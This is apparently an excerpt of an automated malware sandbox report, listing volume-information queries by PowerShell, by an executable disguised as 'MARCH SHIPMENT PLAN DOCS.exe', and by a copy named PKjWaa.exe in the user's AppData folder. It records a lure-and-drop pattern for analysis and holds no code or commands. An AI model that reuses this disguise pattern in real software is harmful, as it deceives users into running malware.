Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation | |